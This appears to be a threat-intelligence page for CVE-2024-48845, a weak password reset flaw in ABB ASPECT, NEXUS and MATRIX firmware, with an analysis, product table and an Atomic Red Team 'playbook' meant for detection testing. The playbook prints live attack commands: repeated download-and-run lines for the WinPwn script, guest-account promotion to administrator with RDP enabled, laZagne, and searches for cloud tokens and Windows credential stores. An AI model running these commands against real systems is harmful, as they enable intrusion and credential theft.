CVE-2024-48845
Overview
This vulnerability is a weakness in password reset enforcement within ABB ASPECT-Enterprise and related firmware versions. The root cause lies in insufficient password complexity and reset rules, allowing storage of weak passwords. The affected components include the password management mechanisms in ABB ASPECT-Enterprise v3.07.02, NEXUS Series v3.07.02, and MATRIX Series v3.07.02 firmware.
Vulnerability Description
Weak Password Reset Rules vulnerabilities where found providing a potiential for the storage of weak passwords that could facilitate unauthorized admin/application access. Affected products: ABB ASPECT - Enterprise v3.07.02; NEXUS Series v3.07.02; MATRIX Series v3.07.02
Impact
An attacker with network access can exploit weak password reset rules to establish or maintain unauthorized administrative or application-level access without authentication or user interaction. This facilitates unauthorized control over affected ABB ASPECT-Enterprise systems, potentially leading to full compromise of confidentiality and integrity, and partial availability impact. The CVSS vector (AV:N/AC:L/PR:N/UI:N) confirms the exploitability without credentials or user action, increasing the risk of unauthorized access and lateral movement within industrial control environments.
Solution
ABB recommends applying the security update detailed in their advisory document 9AKK108469A7497, which addresses password reset enforcement in ABB ASPECT-Enterprise and related firmware versions 3.07.02. This update enforces stronger password policies during reset operations. Administrators should download and deploy the patch as per ABB’s official instructions available at https://search.abb.com/library/Download.aspx?DocumentID=9AKK108469A7497 to remediate the vulnerability.
EPSS vs KEV Prediction — Evolution (30 days)
Full Analysis
The vulnerability associated with weak password reset rules presents a significant security concern for several ABB products, including the ASPECT Enterprise, NEXUS Series, and MATRIX Series. This issue arises from inadequate enforcement of password complexity requirements during the reset process, allowing users to set easily guessable or common passwords. Such weaknesses can lead to unauthorized access to administrative and application functionalities, potentially compromising sensitive data and system integrity. The high CVSS score of 9.8 underscores the severity of this vulnerability, indicating a critical need for immediate attention and remediation.
Attack vectors exploiting this vulnerability can be varied and sophisticated. An attacker could initiate a password reset request, leveraging social engineering tactics or phishing to obtain access to the user's email or phone number associated with the account. Once the reset process is initiated, the attacker can set a weak password, which may be easily guessed or derived from common patterns. With administrative access, the attacker could manipulate system settings, exfiltrate sensitive data, or deploy malicious payloads, leading to broader network compromises. Additionally, the lack of robust logging and monitoring mechanisms may allow such activities to go undetected for extended periods, exacerbating the potential damage.
The real-world impact of this vulnerability can be profound, particularly for organizations relying on these ABB products for critical operations. Unauthorized access to administrative functions can lead to operational disruptions, data breaches, and potential regulatory penalties, especially in industries governed by strict compliance standards. The financial implications of such incidents can be severe, including costs associated with incident response, legal liabilities, and reputational damage. Furthermore, the interconnected nature of modern industrial systems means that a breach in one area can have cascading effects across the entire network, amplifying the risk and potential fallout.
To effectively detect and mitigate this vulnerability, organizations should implement a multi-faceted approach. First, enforcing strong password policies that require complex passwords during the reset process is essential. This could include minimum length requirements, the use of special characters, and restrictions against commonly used passwords. Additionally, organizations should consider implementing multi-factor authentication (MFA) to add an extra layer of security, making it significantly more difficult for unauthorized users to gain access, even if they manage to reset a password. Regular security audits and vulnerability assessments can help identify weaknesses in password management practices and ensure compliance with best practices.
In conclusion, the vulnerability associated with weak password reset rules poses a critical threat to the security of ABB's ASPECT, NEXUS, and MATRIX products. The potential for unauthorized access, coupled with the severe real-world implications, necessitates immediate action from affected organizations. By adopting robust password policies, implementing multi-factor authentication, and conducting regular security assessments, organizations can significantly reduce the risk associated with this vulnerability and enhance their overall cybersecurity posture.
CSURFACE threat intelligence has detected a marked escalation in the Exploit Prediction Scoring System (EPSS) score for CVE-2024-48845, reflecting a significant increase in the likelihood of exploitation. The EPSS score has surged by over 160%, stabilizing at a level that places this vulnerability within the top percentile of actively targeted flaws. This shift underscores a growing attacker focus on weak password reset mechanisms within ABB’s ASPECT, NEXUS, and MATRIX product lines. Our telemetry indicates that while the volume of exploitation attempts remains steady, the elevated EPSS score correlates with the emergence of new proof-of-concept exploits publicly available on recognized exploit repositories. This development heightens the urgency for defenders, as it signals that adversaries have refined their capabilities to leverage this vulnerability more effectively. Consequently, the threat level associated with CVE-2024-48845 has intensified, warranting increased vigilance and prioritization in vulnerability management programs.
Affected Products (19)
| Vendor | Product | Version | CPE | |
|---|---|---|---|---|
|
|
Abb | Aspect-Ent-2 Firmware | All |
cpe:2.3:o:abb:aspect-ent-2_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Aspect-Ent-256 Firmware | All |
cpe:2.3:o:abb:aspect-ent-256_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Aspect-Ent-96 Firmware | All |
cpe:2.3:o:abb:aspect-ent-96_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Nexus-2128 Firmware | All |
cpe:2.3:o:abb:nexus-2128_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Nexus-2128-A Firmware | All |
cpe:2.3:o:abb:nexus-2128-a_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Nexus-2128-F Firmware | All |
cpe:2.3:o:abb:nexus-2128-f_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Nexus-2128-G Firmware | All |
cpe:2.3:o:abb:nexus-2128-g_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Nexus-264 Firmware | All |
cpe:2.3:o:abb:nexus-264_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Nexus-264-A Firmware | All |
cpe:2.3:o:abb:nexus-264-a_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Nexus-264-G Firmware | All |
cpe:2.3:o:abb:nexus-264-g_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Nexus-3-2128 Firmware | All |
cpe:2.3:o:abb:nexus-3-2128_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Aspect-Ent-12 Firmware | All |
cpe:2.3:o:abb:aspect-ent-12_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Nexus-264-F Firmware | All |
cpe:2.3:o:abb:nexus-264-f_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Nexus-3-264 Firmware | All |
cpe:2.3:o:abb:nexus-3-264_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Matrix-11 Firmware | All |
cpe:2.3:o:abb:matrix-11_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Matrix-216 Firmware | All |
cpe:2.3:o:abb:matrix-216_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Matrix-232 Firmware | All |
cpe:2.3:o:abb:matrix-232_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Matrix-264 Firmware | All |
cpe:2.3:o:abb:matrix-264_firmware:*:*:*:*:*:*:*:*
|
|
|
Abb | Matrix-296 Firmware | All |
cpe:2.3:o:abb:matrix-296_firmware:*:*:*:*:*:*:*:*
|
Disclaimer
The exploits, modules, and proof-of-concept (PoC) code listed in this section are automatically collected from public repositories, including GitHub, ExploitDB, and Metasploit Framework.
CSURFACE is not the author, maintainer, or responsible party for any of this code. The content may contain malicious code, backdoors, or undocumented behavior.
By accessing any external link or executing any referenced code, you assume full responsibility for the risks involved. We strongly recommend:
- Only execute in isolated environments (sandbox/VM)
- Review source code before any execution
- Do not use against systems without explicit authorization
- Comply with all applicable local laws and regulations
ExploitDB (1)
| Title | Author | Type | Platform | Date | Link |
|---|---|---|---|---|---|
| ABB Cylon Aspect 3.07.02 (userManagement.php) - Weak Password Policy | LiquidWorm | hardware | multiple | - | View |
Threat Feed
1 eventsPublic exploit code is available for this vulnerability
Likely Kill Chain
Typical exploitation path inferred from this vulnerability's characteristics — mapped to MITRE ATT&CK tactics.
Kill chain derived from the ML classifier.
Attack Vectors ML
MITRE ATT&CK Techniques (7)
The adversary's likely kill chain after exploiting this CVE — in execution order. Validate each stage with the Red Team Playbook below.
The techniques for this CVE don't apply to this operating system. Switch OS above.
CAPEC Attack Patterns ML
Red Team Playbook
37 AtomicRedTeam test(s) mapped to this CVE's kill chain. Use them to validate detections and controls.
AtomicRedTeam has no published tests for this CVE's techniques on this OS. Switch OS above to see other options.
Set-PowerCLIConfiguration -InvalidCertificateAction Ignore -ParticipateInCEIP:$false -Confirm:$false
Connect-VIServer -Server #{vm_host} -User #{vm_user} -Password #{vm_pass}
Get-VMHostService -VMHost #{vm_host} | Where-Object {$_.Key -eq "TSM-SSH" } | Start-VMHostService -Confirm:$false
echo "" | "#{plink_file}" -batch "#{vm_host}" -ssh -l #{vm_user} -pw "#{vm_pass}" "vim-cmd hostsvc/enable_ssh"
docker build -t t1046 $PathToAtomicsFolder/T1046/src/
docker run --name t1046_container --rm -d -t t1046
docker exec t1046_container /scan.sh
for port in {1..65535}; do (2>/dev/null echo >/dev/tcp/#{host}/$port) && echo port $port is open ; done
nmap #{host_to_scan}
sudo nmap -sS #{network_range} -p #{port}
telnet #{host} #{port}
nc -nv #{host} #{port}
nmap -Pn -sV -p #{port_range} #{host}
python "#{filename}" -i #{host_ip}
$ipAddr = "#{ip_address}"
if ($ipAddr -like "*,*") {
$ip_list = $ipAddr -split ","
$ip_list = $ip_list.ForEach({ $_.Trim() })
Write-Host "[i] IP Address List: $ip_list"
$ports = #{port_list}
foreach ($ip in $ip_list) {
foreach ($port in $ports) {
Write-Host "[i] Establishing connection to: $ip : $port"
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} elseif ($ipAddr -notlike "*,*") {
if ($ipAddr -eq "") {
# Assumes the "primary" interface is shown at the top
$interface = Get-NetIPInterface -AddressFamily IPv4 -ConnectionState Connected | Select-Object -ExpandProperty InterfaceAlias -First 1
Write-Host "[i] Using Interface $interface"
$ipAddr = Get-NetIPAddress -AddressFamily IPv4 -InterfaceAlias $interface | Select-Object -ExpandProperty IPAddress
}
Write-Host "[i] Base IP-Address for Subnet: $ipAddr"
$subnetSubstring = $ipAddr.Substring(0, $ipAddr.LastIndexOf('.') + 1)
# Always assumes /24 subnet
Write-Host "[i] Assuming /24 subnet. scanning $subnetSubstring'1' to $subnetSubstring'254'"
$ports = #{port_list}
$subnetIPs = 1..254 | ForEach-Object { "$subnetSubstring$_" }
foreach ($ip in $subnetIPs) {
foreach ($port in $ports) {
try {
$tcp = New-Object Net.Sockets.TcpClient
$tcp.ConnectAsync($ip, $port).Wait(#{timeout_ms}) | Out-Null
} catch {}
if ($tcp.Connected) {
$tcp.Close()
Write-Host "Port $port is open on $ip"
}
}
}
} else {
Write-Host "[Error] Invalid Inputs"
exit 1
}
Get-Service -Name "Remote Desktop Services", "Remote Desktop Configuration"
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
MS17-10 -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
bluekeep -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
fruit -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
spoolvulnscan -noninteractive -consoleoutput
Start-Process -FilePath "#{autoit_path}" -ArgumentList "#{script_path}"
net user #{guest_user} /active:yes
sudo sysadminctl -guestAccount on
net user #{guest_user} /active:yes
net user #{guest_user} #{guest_password}
net localgroup #{local_admin_group} #{guest_user} /add
net localgroup "#{remote_desktop_users_group_name}" #{guest_user} /add
reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f
reg add "hklm\system\CurrentControlSet\Control\Terminal Server" /v "AllowTSConnections" /t REG_DWORD /d 0x1 /f
$extList = #{extension_id}
foreach ($extension in $extList) {
New-Item -Path HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extension -Force
New-ItemProperty -Path "HKLM:\Software\Wow6432Node\Google\Chrome\Extensions\$extension" -Name "update_url" -Value "https://clients2.google.com/service/update2/crx" -PropertyType "String" -Force}
Start chrome
Start-Sleep -Seconds 30
Stop-Process -Name "chrome"
echo "Creating %systemroot%\wpbbin.exe"
New-Item -ItemType File -Path "$env:SystemRoot\System32\wpbbin.exe"
type C:\Windows\Panther\unattend.xml
type C:\Windows\Panther\Unattend\unattend.xml
python2 laZagne.py all
grep -ri password #{file_path}
exit 0
findstr /si pass *.xml *.doc *.txt *.xls
ls -R | select-string -ErrorAction SilentlyContinue -Pattern password
find #{file_path}/.aws -name "credentials" -type f 2>/dev/null
find #{file_path}/.azure -name "msal_token_cache.json" -o -name "accessTokens.json" -type f 2>/dev/null
find #{file_path}/.config/gcloud -name "credentials.db" -o -name "access_tokens.db" -type f 2>/dev/null
find #{file_path}/.oci/sessions -name "token" -type f 2>/dev/null
for file in $(find #{file_path} -type f -name .netrc 2> /dev/null);do echo $file ; cat $file ; done
dir /a:h C:\Users\%USERNAME%\AppData\Local\Microsoft\Credentials\
dir /a:h C:\Users\%USERNAME%\AppData\Roaming\Microsoft\Credentials\
$usernameinfo = (Get-ChildItem Env:USERNAME).Value
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Roaming\Microsoft\Credentials\
Get-ChildItem -Hidden C:\Users\$usernameinfo\AppData\Local\Microsoft\Credentials\
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
SharpCloud -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sessionGopher -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
Snaffler -noninteractive -consoleoutput
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
passhunt -local $true -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
powershellsensitive -consoleoutput -noninteractive
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
sensitivefiles -noninteractive -consoleoutput
Detection & Response Rules
No detection or response rules found for this CVE.
No news articles found for this CVE.
References (2)
| Title | Tags | URL |
|---|---|---|
| nvd.nist.gov |
NVD
reference
|
https://nvd.nist.gov/vuln/detail/CVE-2024-48845 |
| search.abb.com |
GitHub CVE
|
https://search.abb.com/library/Download.aspx?DocumentID=9AKK108469A7497&LanguageCode=en&DocumentPartId=&Action=Launch |